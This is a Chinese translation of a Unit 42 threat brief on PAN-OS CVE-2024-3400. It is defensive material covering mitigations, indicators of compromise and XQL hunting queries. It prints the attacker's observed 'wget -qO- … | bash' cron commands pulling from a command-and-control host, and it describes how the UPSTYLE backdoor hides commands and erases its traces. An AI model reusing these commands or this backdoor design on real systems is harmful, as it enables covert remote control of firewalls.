执行摘要
Palo Alto Networks 和 Unit 42 致力于跟踪与 CVE-2024-3400 相关的活动,并与外部研究人员、合作伙伴和客户合作,透明、快速地共享信息。
Palo Alto Networks PAN-OS 软件中的一个关键命令注入漏洞使未经身份验证的攻击者能够在防火墙上以 root 权限执行任意代码。该漏洞分配为 CVE-2024-3400,CVSS 评分为 10.0。
此问题仅适用于配置了 GlobalProtect 网关或 GlobalProtect 门户(或两者)并启用设备遥测的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙。此问题不会影响云防火墙 (Cloud NGFW)、Panorama 设备或 Prisma Access。有关受影响的产品和版本的最新信息,请参阅有关此问题的Palo Alto Networks 安全公告。
Palo Alto Networks 已意识到有人恶意利用此问题。我们正在以“MidnightEclipse 行动”的名义跟踪此漏洞的初始利用,因为我们非常有信心地评估,迄今为止我们分析的已知利用仅限于单个威胁参与者。我们还评估其他威胁行为者将来可能会尝试利用该漏洞。
此威胁简介将涵盖有关该漏洞的信息以及我们对后利用的了解。我们将分享缓解该漏洞的临时指南,但读者还应参阅安全公告以获取特定产品版本信息和修复指南。随着更多信息的出现,我们将继续更新此威胁简介。
如果您认为您的防火墙已遭到破坏,请联系Palo Alto Networks 支持。
此问题已在 PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 和所有更高版本的 PAN-OS 修补程序版本中修复。其他常用维护版本的修补程序也将提供。请参阅Palo Alto Networks针对即将发布的修补程序的 ETA 安全公告。
作为最佳实践,Palo Alto Networks 建议您监视网络是否存在异常活动并调查任何意外的网络活动。
我们要感谢 Volexity 发现这个问题以及他们持续的协调和合作。请参考 Volexity 的博客进行分析。
Palo Alto Networks 客户通过以下方式获得针对 CVE-2024-3400 和利用后活动中使用的恶意软件的保护和缓解措施:
Palo Alto Networks 建议客户使用威胁防护订阅,通过启用威胁 ID 95187(在应用程序和威胁内容版本 8833-8682 中引入)来阻止针对此漏洞的攻击。除了启用威胁 ID 95187 之外,客户还必须确保其 GlobalProtect 接口已应用漏洞保护,以防止在其设备上利用此问题。请参阅相关的LIVE 社区文章以了解更多信息。
如果您目前无法应用基于威胁防护的缓解措施,您仍然可以通过暂时禁用设备遥测来减轻此漏洞的影响,直到设备升级到固定的 PAN-OS 版本。升级后,应在设备上重新启用设备遥测。
下面的托管威胁追踪部分包括可用于搜索利用此 CVE 的迹象的 XQL 查询。
Unit 42 事件响应团队也可以参与帮助达成妥协或提供主动评估以降低您的风险。
目录
漏洞详细信息
当前攻击范围
临时指导
单元 42 托管威胁搜寻查询
结论
Palo Alto Networks 针对 CVE-2024-3400 的产品保护具有高级威胁防护Cortex XDR、XSIAM 和统一云代理Cortex 的
下一代防火墙和 Prisma Access Xpanse 和 XSIAM ASM 模块受损指标UPSTYLE 后门命令和控制基础设施托管 Python 后门观察到的命令其他资源
漏洞详情
Palo Alto Networks PAN-OS 软件中的命令注入漏洞使未经身份验证的攻击者能够在防火墙上以 root 权限执行任意代码。此问题仅适用于配置了 GlobalProtect 网关或 GlobalProtect 门户(或两者)并启用设备遥测的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙。
您可以通过检查防火墙 Web 界面中的条目来验证是否配置了这些功能。我们的安全通报包括有关如何暂时禁用设备遥测的进一步说明的链接。
Palo Alto Networks 已发现利用此漏洞的针对性攻击。下一节将介绍我们观察到的利用后活动的详细信息。
目前的攻击范围
作为在 MidnightEclipse 行动中观察到的活动的一部分,在利用之后,威胁参与者创建了一个 cronjob,该 cronjob 每分钟运行一次,以访问托管在外部服务器上的命令,这些命令将通过 bash 执行,如以下命令所示:
wget -qO- hxxp://172.233.228[.]93/policy | bash
我们无法访问通过此 URL 执行的命令。然而,我们相信这个 URL 被用来部署第二个基于 Python 的后门,我们 Volexity 的同事将其称为 UPSTYLE。
上传到防火墙的 UPSTYLE 后门托管在hxxp://144.172.79[.]92/update.py,但我们看到类似的后门托管在nhdata.s3-us-west-2.amazonaws[.]com。根据 HTTP 标头,威胁行为者最后一次修改它似乎是在 2024 年 4 月 7 日。
Accept-Ranges: bytes
Content-Length: 5187
Content-Type: application/octet-stream
Date: Thu, 11 Apr 2024 16:12:16 GMT
Etag: "6612443d-1443"
Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT
Server: nginx/1.18.0 (Ubuntu)
托管在144.172.79[.]92 的update.py文件的 SHA256 值为3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac。该文件是一个具有多层的后门。
首先,update.py将另一个 Python 脚本写入以下位置:
[snip]/site-packages/system.pth
写入system.pth Base64 的 Python 脚本会解码嵌入的 Python 脚本并执行它。这个嵌入的Python脚本有两个名为protect和check的函数,它们按该顺序调用。保护函数发送 SIGTERM 信号并将system.pth文件的内容写回自身,这可能是作为持久性机制。检查函数将在运行另一个 Base64 嵌入式 Python 脚本(即功能后门)之前读取/proc/self/cmdline以查看其是否作为监视器 mp 运行。
system.pth运行的 Python 脚本有一个名为__main的函数,它将在线程中运行。该函数首先读取以下文件的内容及其访问和修改时间:
[snip]/css/bootstrap.min.css
然后它进入一个无限循环,每两秒迭代一次,读取以下文件:
[snip]/sslvpn_ngx_error.log
然后,脚本将迭代文件的每一行,并使用以下正则表达式在该行中搜索威胁参与者的命令:
img[([a-zA-Z0-9+/=]+)]
如果上述正则表达式匹配,脚本将对命令的内容进行 Base64 编码,并使用Python 操作系统模块中的popen方法运行它。 sslvpn_ngx_error.log文件中与正则表达式不匹配的行将写回该文件,这实际上会删除包含命令的行,使其不再保留在sslvpn_ngx_error.log文件中以供以后分析。
运行命令后,脚本将命令的输出写入以下文件:
[snip]/css/bootstrap.min.css
然后,该脚本将创建另一个线程来运行名为“restore”的函数。恢复功能获取bootstrap.min.css文件的原始内容以及原始访问和修改时间,休眠 15 秒并将原始内容写回文件,并将访问和修改时间设置为其原始值。此函数的目的是避免让命令的输出可供分析。此外,这表明威胁行为者已将此后门的客户端内置了自动化功能,因为在后门覆盖文件之前他们只有 15 秒的时间来获取结果。
使用 crontab 中的初始后门,我们有证据表明威胁行为者在防火墙上运行了一些命令。这些命令包括将配置文件复制到 Web 应用程序文件夹,并通过对这些文件的 HTTP 请求来窃取它们。我们发现以下 IP 地址试图访问复制到此文件夹的特定配置文件,我们认为该文件是威胁行为者使用的 VPN:
66.235.168[.]222
我们还观察到威胁参与者运行另一个命令来接收来自稍微不同的 URL 的命令作为 cronjob 后门:
wget -qO- hxxp://172.233.228[.]93/patch|bash
最后,威胁行为者通过删除与后门相关的所有文件并清除其 cronjobs 来自行清理。
单元 42 托管威胁追踪查询
Unit 42 托管威胁追踪团队使用 Cortex XDR 和下面的 XQL 查询,继续跟踪我们客户中任何利用此 CVE 的尝试。 Cortex XDR 客户还可以使用这些 XQL 查询来搜索利用迹象。
// Description: Search for domain IOC in raw NGFW logs
dataset = panw_ngfw_url_raw
| filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com"
| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid
// Description: Detect hits for the specific prevention signature for CVE-2024-3400
config case_sensitive = false
| dataset = panw_ngfw_threat_raw
| filter threat_id = "95187"
| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, *
// Description: Hits for known IOCs in NGFW traffic
config case_sensitive = false
| dataset = panw_ngfw_traffic_raw
| filter source_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") or dest_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93")
| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason
// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)
config case_sensitive = false
| dataset = xdr_data
| filter event_type = ENUM.STORY
| filter action_remote_ip in ("172.233.228.93", "66.235.168.222", "144.172.79.92") OR dns_query_name ~= ".nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~= ".nhdata.s3-us-west-2.amazonaws.com"
| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname
结论
该安全公告将继续提供有关 Palo Alto Networks 产品影响的最新信息以及建议的缓解措施。我们将继续使用有关利用的信息更新此威胁简报。
Palo Alto Networks 再次感谢 Volexity 发现此问题以及他们持续的协调和合作。请参考 Volexity 的博客进行分析。
Palo Alto Networks 已与网络威胁联盟 (CTA) 成员分享了我们的发现。 CTA 成员利用这些情报快速为其客户部署保护措施,并系统地破坏恶意网络行为者。了解有关网络威胁联盟的更多信息。
针对观察到的利用活动的保护和缓解措施如下,并将随着更多可用内容而更新。
妥协指标
UPSTYLE后门
Update.py
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
命令和控制基础设施
172.233.228[.]93
hxxp://172.233.228[.]93/policy
hxxp://172.233.228[.]93/patch
66.235.168[.]222
托管Python后门
144.172.79[.]92
nhdata.s3-us-west-2.amazonaws[.]com
观察到的命令
wget -qO- hxxp://172.233.228[.]93/patch|bash
wget -qO- hxxp://172.233.228[.]93/policy |bash
参考链接: https://unit42.paloaltonetworks.com/cve-2024-3400/
图片来源网络侵权可联系删除